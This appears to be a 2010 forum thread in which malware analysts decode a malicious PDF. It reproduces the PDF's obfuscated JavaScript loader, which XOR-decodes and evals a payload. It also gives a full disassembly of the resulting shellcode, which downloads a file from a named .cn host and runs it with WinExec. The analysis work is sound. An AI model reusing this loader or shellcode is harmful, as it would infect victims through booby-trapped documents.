Author Topic: PDF FILE  (Read 3389 times)

0 Members and 1 Guest are viewing this topic.

September 02, 2010, 06:24:31 am
Read 3389 times

MADY

  • Newbie

  • Offline
  • *

  • 7
Hi,

Attached is a PDF file and i tried to decode it using pdf-parser. I was not able to find out the URL of the payload. please could some one help me on this.

http://jsunpack.jeek.org/dec/go?report=a63ed320cbc6b56496e1348793778864ff6f189f

I have done my decoding upto this level

>pdf-parser.py --object 11 --raw --filter a.pdf

var  mailSend = String ; var  sdsdf = 1 ; var  foxit = "" ; var  check = 101 ;  var d = [ "ev" , "" , "al" ]; v = new  String ( d [ 0 ] + d [ 2 ] + d [ 1 ] ) ;  var unlock = [ "p" , "p" , "" , "a" ]; checkArray = new  String ( unlock [ 3 ] + unlock [ 0 ] + unlock [ 0 ] + unlock [ 2 ] ) ;   var  dsjkgAdobe = new String("DEYfrom".substr(3)+"Char"+"CodePxvj".substr(0,4)) ; var  window = "IRScharC".substr(3)+"odeAt" ; var  sdrt = "unes"+"cape" ; var  dA = new String("getP"+"ageN"+"umWo"+"rds") ; var  mailD = "8jKgetP".substr(3)+"zU6ageN".substr(3)+"thWo"+"rdMPLH".substr(0,2) ;  function  b ( unlockA , sdfjhD ) { return  unlockA ^ sdfjhD ; }  var  google = "7wqsubst".substr(3)+"5bBrbB5".substr(3,1) ; var  sdftuf = 0 ; var  bSdfj = new String("%irFT".substr(0,1)) ; var  emailSdrt = 2 ;  var  checkArray = this [ checkArray ] ; var  dDsjkg = this [ dA ] ( sdsdf ) ; var  cFoxit = this [ v ] ; var  sdsdfU = this [ sdrt ] ;  for ( var  sdB = sdftuf ; sdB < dDsjkg ; sdB++ ) {   dDs = this [ mailD ] ( sdsdf , sdB ) ;  var  uSend = dDs [ google ] ( dDs . length - emailSdrt , emailSdrt ) ; var  checkArraySdftuf = bSdfj + uSend ; var  googleC = sdsdfU ( checkArraySdftuf ) ; var  dsCheck = googleC [ window ] ( sdftuf ) ; var  sdftufGet = b ( dsCheck , check ) ;  foxit += mailSend [ dsjkgAdobe ] ( sdftufGet ) ; }  cFoxit ( foxit ) ;

I am not sure how to proceed further...

Thanks
MAD


September 02, 2010, 06:25:33 am
Reply #1

MADY

  • Newbie

  • Offline
  • *

  • 7
forgot to attach the file  ???

September 03, 2010, 01:29:41 am
Reply #2

MAD

  • Special Members
  • Sr. Member

  • Offline
  • *

  • 171
  • Personal Text
    Malware Analyst
Hi,

Code: [Select]
0X00  33C0              XOR EAX,EAX
0X02  648B4030          MOV EAX,[FS:EAX+0X30]
0X06  780C              JS 0X14
0X08  8B400C            MOV EAX,[EAX+0XC]
0X0B  8B701C            MOV ESI,[EAX+0X1C]
0X0E  AD                LODSD
0X0F  8B5808            MOV EBX,[EAX+0X8]
0X12  EB09              JMP SHORT 0X1D
0X14  8B4034            MOV EAX,[EAX+0X34]
0X17  8D407C            LEA EAX,[EAX+0X7C]
0X1A  8B583C            MOV EBX,[EAX+0X3C]
0X1D  6A44              PUSH BYTE +0X44
0X1F  5A                POP EDX
0X20  D1E2              SHL EDX,1
0X22  2BE2              SUB ESP,EDX
0X24  8BEC              MOV EBP,ESP
0X26  EB4F              JMP SHORT 0X77
0X28  5A                POP EDX
0X29  52                PUSH EDX
0X2A  83EA56            SUB EDX,BYTE +0X56
0X2D  895504            MOV [EBP+0X4],EDX
0X30  56                PUSH ESI
0X31  57                PUSH EDI
0X32  8B733C            MOV ESI,[EBX+0X3C]
0X35  8B743378          MOV ESI,[EBX+ESI+0X78]
0X39  03F3              ADD ESI,EBX ; MATH
0X3B  56                PUSH ESI
0X3C  8B7620            MOV ESI,[ESI+0X20]
0X3F  03F3              ADD ESI,EBX ; MATH
0X41  33C9              XOR ECX,ECX
0X43  49                DEC ECX
0X44  50                PUSH EAX
0X45  41                INC ECX
0X46  AD                LODSD
0X47  33FF              XOR EDI,EDI
0X49  360FBE1403        MOVSX EDX,BYTE [SS:EBX+EAX]
0X4E  38F2              CMP DL,DH
0X50  7408              JZ 0X5A
0X52  C1CF0D            ROR EDI,0XD
0X55  03FA              ADD EDI,EDX
0X57  40                INC EAX
0X58  EBEF              JMP SHORT 0X49
0X5A  58                POP EAX
0X5B  3BF8              CMP EDI,EAX
0X5D  75E5              JNZ 0X44
0X5F  5E                POP ESI
0X60  8B4624            MOV EAX,[ESI+0X24]
0X63  03C3              ADD EAX,EBX ; MATH
0X65  668B0C48          MOV CX,[EAX+ECX*2]
0X69  8B561C            MOV EDX,[ESI+0X1C]
0X6C  03D3              ADD EDX,EBX ; MATH
0X6E  8B048A            MOV EAX,[EDX+ECX*4]
0X71  03C3              ADD EAX,EBX ; MATH
0X73  5F                POP EDI
0X74  5E                POP ESI
0X75  50                PUSH EAX
0X76  C3                RET
0X77  8D7D08            LEA EDI,[EBP+0X8]
0X7A  57                PUSH EDI
0X7B  52                PUSH EDX
0X7C  B833CA8A5B        MOV EAX,0X5B8ACA33
0X81  E8A2FFFFFF        CALL 0X28
0X86  32C0              XOR AL,AL
0X88  8BF7              MOV ESI,EDI
0X8A  F2AE              REPNE SCASB
0X8C  4F                DEC EDI
0X8D  B8652E6578        MOV EAX,0X78652E65
0X92  AB                STOSD
0X93  6698              CBW
0X95  66AB              STOSW
0X97  B06C              MOV AL,0X6C
0X99  8AE0              MOV AH,AL
0X9B  98                CWDE
0X9C  50                PUSH EAX
0X9D  686F6E2E64        PUSH DWORD 0X642E6E6F
0XA2  6875726C6D        PUSH DWORD 0X6D6C7275
0XA7  54                PUSH ESP
0XA8  B88E4E0EEC        MOV EAX,0XEC0E4E8E
0XAD  FF5504            CALL NEAR [EBP+0X4]
0XB0  93                XCHG EAX,EBX
0XB1  50                PUSH EAX
0XB2  33C0              XOR EAX,EAX
0XB4  50                PUSH EAX
0XB5  50                PUSH EAX
0XB6  56                PUSH ESI
0XB7  8B5504            MOV EDX,[EBP+0X4]
0XBA  83C27F            ADD EDX,BYTE +0X7F
0XBD  83C231            ADD EDX,BYTE +0X31
0XC0  52                PUSH EDX
0XC1  50                PUSH EAX
0XC2  B8361A2F70        MOV EAX,0X702F1A36
0XC7  FF5504            CALL NEAR [EBP+0X4]
0XCA  5B                POP EBX
0XCB  33FF              XOR EDI,EDI
0XCD  57                PUSH EDI
0XCE  56                PUSH ESI
0XCF  B898FE8A0E        MOV EAX,0XE8AFE98
0XD4  FF5504            CALL NEAR [EBP+0X4]
0XD7  57                PUSH EDI
0XD8  B8EFCEE060        MOV EAX,0X60E0CEEF
0XDD  FF5504            CALL NEAR [EBP+0X4]

GetTempPathA
LoadLibraryA
WinExec("http://vxoyqgcp.cn/el245/viewtop.php?spl=pdf_9apr",...)
ExitThread

Look here, http://www.malwaredomainlist.com/forums/index.php?topic=1544.msg18995#msg18995

Forgot to attach the file ? Take a look on JSUNPACK -> File information (3 files) Download zip | Explanation

Regards,
MAD
pinpin sayz: All ur PE's bel0ng 2 Us

September 03, 2010, 09:23:30 am
Reply #3

MADY

  • Newbie

  • Offline
  • *

  • 7
Thanks a lot for your prompt reply.

As i told already, i am able to do 1st level decoding and its very difficult to do the next level manually. I am a newbie and very much intersted in decoding the PDF to find out the url of the payload.

Your explanation is very difficult to understand since i am new to this area and expecting your detailed & step by step explanation on how to get the URL. Please :(


Thanks in Advance
MAD